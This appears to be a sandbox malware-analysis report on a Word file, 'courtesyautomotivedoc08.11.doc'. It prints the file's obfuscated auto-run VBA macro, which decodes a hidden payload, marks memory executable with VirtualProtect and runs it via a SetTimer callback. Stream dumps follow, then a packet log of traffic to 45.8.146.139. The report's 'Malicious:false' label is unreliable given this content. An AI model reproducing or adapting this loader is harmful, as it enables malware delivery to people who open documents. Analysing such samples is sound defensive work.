                                            SHA-512:F7CEC1177D4FF3F84F6F2A2A702E96713322AA56C628B49F728CD608E880255DA3EF412DE15BB58DF66D65560C03E68BA2A0DD6FDFA533BC9E428B0637562AEA
                                            Malicious:false
                                            Preview:.user..................................................A.l.b.u.s.............p........1h..............2h.............@3h..............3h.....z.......p4h.....x...

                                            Static File Info

                                            General

                                            File type:Zip archive data, at least v2.0 to extract
                                            Entropy (8bit):7.993716000279979
                                            TrID:
                                            • Word Microsoft Office Open XML Format document (49504/1) 49.01%
                                            • Word Microsoft Office Open XML Format document (43504/1) 43.07%
                                            • ZIP compressed archive (8000/1) 7.92%
                                            File name:courtesyautomotivedoc08.11.doc
                                            File size:2351271
                                            MD5:00e8f42e0462d4abf8a6bb6960abe5b5
                                            SHA1:0235d1eb73c161a7fcc944d99730d8ed0200fb8e
                                            SHA256:3af042bd0b5a186b98920cf0b7066344609d6d6deb163ffb0b60325dcca66e44
                                            SHA512:927b5d5c0a8230738b5e56d05f2b0c669c2a564ef013707cce466250ddddb6d779077e4a8ee75ed39bc4a6485cbf30b6ba6edc8f819b74fd3f400e6c84460f96
                                            SSDEEP:49152:kMZ2Nedqe2qza5yNggQYE38nhoaCuqgpuIV/gGfikxc/X6YR:5dqerz3EOhLig/gGKkxGX6YR
                                            TLSH:3DB533B24150779A263D137BC044B6E67936ABA68F84857C08D78D9FE931FFF204852D
                                            File Content Preview:PK..........!..U~............._rels/.rels...J.@............4.E..D.....$....T..w-..j........|.zs..z..z.*X.%(v......6O.{PI........`S__._x .C..CR....:....t..R......hI.3..H.Q..*.;..=..y... n.......yo.......[vrf..A..6..3[.>_...-K....\NH!....<..r...E.B..P...<_.

                                            File Icon

                                            Icon Hash:e4eea2aaa4b4b4a4

                                            Static OLE Info

                                            General

                                            Document Type:OpenXML
                                            Number of OLE Files:1

                                            OLE File "/opt/package/joesandbox/database/analysis/682567/sample/courtesyautomotivedoc08.11.doc"

                                            Indicators
                                            Has Summary Info:
                                            Application Name:
                                            Encrypted Document:False
                                            Contains Word Document Stream:True
                                            Contains Workbook/Book Stream:False
                                            Contains PowerPoint Document Stream:False
                                            Contains Visio Document Stream:False
                                            Contains ObjectPool Stream:False
                                            Flash Objects Count:0
                                            Contains VBA Macros:True

                                            Streams with VBA

                                            VBA File Name: ThisDocument.cls, Stream Size: 2862
                                            General
                                            Stream Path:VBA/ThisDocument
                                            VBA File Name:ThisDocument.cls
                                            Stream Size:2862
                                            Data ASCII:. . A t t r i b u t . e V B _ N a m . e = " T h i . s D o c u m e n . t " . . . B a s . . 1 N o r m a l . . . V G l o b a l ! . S p a c . l F a . l s e . J C r e a . t a b l . . P r e d e c l a . . I d . . # T r u . " E x p . o s e . . T e m p . l a t e D e r i . v . $ C u s t o m l i z C . P . . . . . D . ? P t r S a . f e F u n c t i o n . . . . . . . . L i b . " u s e r 3 2 " . A l i a s " . K i l l T i m e . r " ( B y V a . l . . A s L o n g - , . . # . . ) . K . .
                                            Data Raw:01 84 b4 00 41 74 74 72 69 62 75 74 00 65 20 56 42 5f 4e 61 6d 00 65 20 3d 20 22 54 68 69 00 73 44 6f 63 75 6d 65 6e 10 74 22 0d 0a 0a 8c 42 61 73 01 02 8c 31 4e 6f 72 6d 61 6c 02 2e 19 56 47 6c 6f 62 61 6c 21 01 aa 53 70 61 63 01 6c 46 61 08 6c 73 65 0c 4a 43 72 65 61 10 74 61 62 6c 15 1f 50 72 65 20 64 65 63 6c 61 00 06 49 64 11 00 23 54 72 75 0d 22 45 78 70 08 6f 73 65 14 1c 54
                                            VBA Code
                                            Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare PtrSafe Function  Lib "user32" Alias "KillTimer" (ByVal  As LongPtr, ByVal  As LongPtr) As LongPtr
Private Declare PtrSafe Function  Lib "kernel32" Alias "VirtualProtect" (ByVal  As LongPtr, ByVal  As LongPtr, ByVal  As LongPtr,  As LongPtr) As LongPtr
Private Declare PtrSafe Function  Lib "user32" Alias "SetTimer" (ByVal  As LongPtr, ByVal  As LongPtr, ByVal  As LongPtr, ByVal  As LongPtr) As LongPtr
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
Function ()
     = 7
    End Function
Function ()
    ReDim (() - 1) As Byte
    Dim  As Long,  As Long
    Dim :  = lOePrNSeOnF7("w9kiTlK") & lOePrNSeOnF7("Q3nlze")
    For  = 0 To () - 1 Step 2
         =  / 2
        () = 255 - ( & (, ) & (,  + 1))
    Next
     = 
End Function
Function ()
     = 5
    End Function
Function (, )
     = Mid(,  + 1, 1)
End Function
Function ()
     = 9
    End Function
Function (Optional  = False)
    If  Then
        Set  = ActiveDocument
    Else
        Set  = (())
    End If
    Set  = 
    End Function
Function ()
     = 4
    End Function
Function (, Optional  = False)
    If  Then
        Set  = GetObject()
    Else
        Set  = ((), )
    End If
    Set  = 
    End Function
Function (, Optional  = False)
    If  Then
         = UBound()
    Else
         = ((), )
    End If
     = 
    End Function
Function ()
     = 10
    End Function
Function ()
     = 1
    End Function
Function ()
     = 3
    End Function
Sub (w)
    Dim  As Long
    Dim  As Long
     = () + ()
    Do
         = ()
        DoEvents
    Loop Until  > 
End Sub
Function (, , Optional  = False)
    If  Then
         = Mid(,  + 1, 1)
    Else
         = ((), , )
    End If
     = 
    End Function
Function (Optional  = False)
    If  Then
        Set  = CallByName((lOePrNSeOnF7("o93TBY150D")), lOePrNSeOnF7("gEzmn7rG"), VbGet, lOePrNSeOnF7("mVwBL4NuTS"))
    Else
        Set  = (())
    End If
    Set  = 
    End Function
Function (, Optional  = Empty, Optional  = Empty, Optional  = Empty)
    Select Case 
            Case ()
                Set  = (, True)
            Case ()
                Set  = (, True)
            Case ()
                Set  = (True)
            Case ()
                Set  = (True)
            Case ()
                Set  = (, True)
            Case ()
                 = (, True)
            Case ()
                 = (, True)
            Case ()
                 = (, True)
            Case ()
                 = (, True)
            Case ()
                 = (, , True)
            Case ()
                 = (True)
            Case ()
                 = (, True)
        End Select
End Function
Function (, Optional  = False)
    If  Then
         = Len()
    Else
         = ((), )
    End If
     = 
    End Function
Function ()
     = 0
    End Function
Function ()
     = 11
    End Function
Function (, Optional  = False)
    If  Then
         = ()
    Else
         = ((), )
    End If
     = 
    End Function
Function ()
     = 2
    End Function
Private Sub Document_Open()
    Dim () As Byte
    If () Then
         = ((lOePrNSeOnF7("ojsqqKJ9Xsmw")).Value)
    Else
         = ((lOePrNSeOnF7("h7BmNH")).Value)
    End If
    Dim  As LongPtr
    Dim  As LongPtr
    Dim  As LongPtr
    Dim  As LongPtr
     = () + 1
     = VarPtr((0))
     , , 64, VarPtr()
            ()(lOePrNSeOnF7("cII3YB")) = lOePrNSeOnF7("uXzVdLx")
         = (0, , 1, )
     1
     0, 
    ().Remove (lOePrNSeOnF7("gYvzmA9m7"))
    ().Remove (lOePrNSeOnF7("diAWT0Ux"))
    ReDim (1)
End Sub
Function ()
    #If Win64 Then
         = True
    #Else
         = False
    #End If
End Function
Function (, Optional  = False)
    If  Then
         = CDec()
    Else
         = ((), )
    End If
     = 
    End Function
Function (, Optional  = False)
    If  Then
        Set  = CallByName((), lOePrNSeOnF7("SwjpO4CYqFz"), VbGet, )
    Else
        Set  = ((), )
    End If
    Set  = 
    End Function
Function ()
     = 6
    End Function
Public Function lOePrNSeOnF7(strInput)
        lOePrNSeOnF7 = StrReverse(ActiveDocument.CustomDocumentProperties(strInput))
    End Function
Function (, Optional  = False)
    If  Then
        Set  = CallByName((), lOePrNSeOnF7("wmubexAZc"), VbGet, )
    Else
        Set  = ((), )
    End If
    Set  = 
    End Function
Function (, Optional  = False)
    If  Then
         = VarPtr()
    Else
         = ((), )
    End If
     = 
    End Function
Function ()
     = 8
    End Function
Function (Optional  = False)
    If  Then
         = Timer()
    Else
         = (())
    End If
     = 
    End Function

                                            Streams

                                            Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 361
                                            General
                                            Stream Path:PROJECT
                                            File Type:ASCII text, with CRLF line terminators
                                            Stream Size:361
                                            Entropy:5.261274960217235
                                            Base64 Encoded:True
                                            Data ASCII:I D = " { B C 4 3 8 9 C 2 - 2 6 C 1 - 4 B 8 E - A 9 6 B - E 7 C 1 A F 0 E F D C 9 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 3 1 3 3 0 0 6 0 0 4 6 0 0 4 6 0 0 4 6 0 0 4 " . . D P B = " 6 2 6 0 5 3 A 0 8 5 A 1 8 5 A 1 8 5 " . . G C = " 9 3 9 1 A 2 F 3 D 2 F 4 D 2 F 4 2 D " . . . . [ H o s t E x t e n d e r I n f o ] . . & H 0 0
                                            Data Raw:49 44 3d 22 7b 42 43 34 33 38 39 43 32 2d 32 36 43 31 2d 34 42 38 45 2d 41 39 36 42 2d 45 37 43 31 41 46 30 45 46 44 43 39 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69
                                            Stream Path: PROJECTwm, File Type: data, Stream Size: 41
                                            General
                                            Stream Path:PROJECTwm
                                            File Type:data
                                            Stream Size:41
                                            Entropy:3.0773844850752607
                                            Base64 Encoded:False
                                            Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
                                            Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00
                                            Stream Path: VBA/_VBA_PROJECT, File Type: ISO-8859 text, with no line terminators, Stream Size: 7
                                            General
                                            Stream Path:VBA/_VBA_PROJECT
                                            File Type:ISO-8859 text, with no line terminators
                                            Stream Size:7
                                            Entropy:1.8423709931771088
                                            Base64 Encoded:False
                                            Data ASCII:a . . .
                                            Data Raw:cc 61 ff ff 00 00 00
                                            Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 5100
                                            General
                                            Stream Path:VBA/__SRP_2
                                            File Type:data
                                            Stream Size:5100
                                            Entropy:1.9352060799527637
                                            Base64 Encoded:False
                                            Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . " . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` ) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:72 55 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 22 00 1f 00 00 00 00 00 01 00 01 00 00 00 01 00 71 07 00 00 00 00 00 00 00 00 00 00 a1 07 00 00 00 00 00 00 00 00 00 00 d1 07
                                            Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 2724
                                            General
                                            Stream Path:VBA/__SRP_3
                                            File Type:data
                                            Stream Size:2724
                                            Entropy:2.7022241373642215
                                            Base64 Encoded:False
                                            Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . P . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . q . . . . . . . . . . . , . . p . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . ` . ! . . . . . . . . . . . \\ . . p . . . . . . A . . . . . . . . . . . . . . . . . . .
                                            Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 50 00 c1 08 00 00 00 00 00 00 00 00 00 00 00 00 04 70 08 00 fe ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                                            Stream Path: VBA/dir, File Type: data, Stream Size: 486
                                            General
                                            Stream Path:VBA/dir
                                            File Type:data
                                            Stream Size:486
                                            Entropy:6.302164636528835
                                            Base64 Encoded:True
                                            Data ASCII:. . . . . . . . . . 0 . . . . . . H . . . . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . 3 Q d - . . . " . < . . . . r s t d o . l e > . . s . t . . d . o . l . e . ( . . h . . ^ . . * \\ . G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . 4 6 } # 2 . 0 # . 0 # C : \\ W i n . d o w s \\ s y s @ t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t . i o n . E N o r ( m a l E N C r . m . a F . . c E C . . . . 1 m . ! O f f i c g O . f . i . c g . . g 2 D F 8 D 0 . 4 C - 5 B F A
                                            Data Raw:01 e2 b1 80 01 00 04 00 00 00 03 00 30 aa 02 02 90 09 00 20 14 06 48 03 00 a8 80 00 00 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 00 08 06 12 09 02 12 80 33 51 f4 64 2d 00 0c 02 22 0a 3c 02 0a 16 02 72 73 74 64 6f 08 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 00 28 0d 00 68 00 11 5e 00 03 2a 5c 00 47 7b 30 30 30

                                            Network Behavior

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Aug 11, 2022 17:38:26.550465107 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:26.655807972 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:26.655991077 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:26.663358927 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:26.766427994 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:26.792161942 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:26.792212963 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:26.792253971 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:26.792294025 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:26.792332888 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:26.792371035 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:26.792382002 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:26.792409897 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:26.792433023 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:26.792449951 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:26.792465925 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:26.792489052 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:26.792524099 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:26.792529106 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:26.792563915 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:26.792608023 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:26.812335968 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:26.900171995 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:26.900192022 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:26.900207996 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:26.900222063 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:26.900233984 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:26.900248051 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:26.900264978 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:26.900281906 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:26.900315046 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:26.900336027 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:26.900352955 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:26.900368929 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:26.900386095 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:26.900403023 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:26.900405884 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:26.900418997 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:26.900424004 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:26.900428057 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:26.900435925 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:26.900440931 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:26.900453091 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:26.900460005 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:26.900470018 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:26.900485992 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:26.900492907 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:26.900502920 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:26.900511980 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:26.900527000 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:26.900542974 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:26.900873899 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.004734993 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.004776001 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.004806995 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.004838943 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.004892111 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.004904032 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.004929066 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.004940987 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.004945993 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.004987001 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.005026102 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.005049944 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.005074024 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.005084038 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.005095005 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.005119085 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.005142927 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.005162954 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.005173922 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.005193949 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.005201101 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.005234003 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.005240917 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.005266905 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.005290985 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.005306005 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.005315065 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.005341053 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.005352020 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.005378962 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.005417109 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.005462885 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.005462885 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.005490065 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.005515099 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.005522966 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.005537033 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.005578995 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.005594969 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.005620956 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.005630970 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.005659103 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.005660057 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.005692959 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.005705118 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.005729914 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.005755901 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.005764008 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.005779982 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.005805969 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.005839109 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.005840063 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.005847931 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.005873919 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.005880117 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.005908012 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.005909920 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.005939960 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.005945921 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.005975008 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.005980968 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.006000042 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.006010056 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.006037951 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.006048918 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.006072998 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.006082058 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.006100893 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.006105900 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.006113052 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.006145954 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.006149054 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.006179094 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.006184101 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.006213903 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.006216049 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.006254911 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.006258965 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.006298065 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.006691933 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.108266115 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.108315945 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.108349085 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.108381987 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.108414888 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.108448982 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.108469009 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.108484983 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.108493090 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.108526945 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.108535051 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.108540058 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.108598948 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.108833075 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.108870029 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.108907938 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.108947039 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.108952045 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.109302044 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.109354973 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.109389067 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.109391928 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.109424114 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.109428883 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.109435081 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.109458923 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.109479904 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.109493971 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.109509945 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.109541893 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.109612942 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.109663963 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.109690905 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.109798908 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.109801054 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.109842062 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.109849930 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.109894037 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.109894991 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.109944105 CEST4917380192.168.2.2245.8.146.139
                                            Aug 11, 2022 17:38:27.109949112 CEST804917345.8.146.139192.168.2.22
                                            Aug 11, 2022 17:38:27.109996080 CEST4917380192.168.2.2245.8.146.139
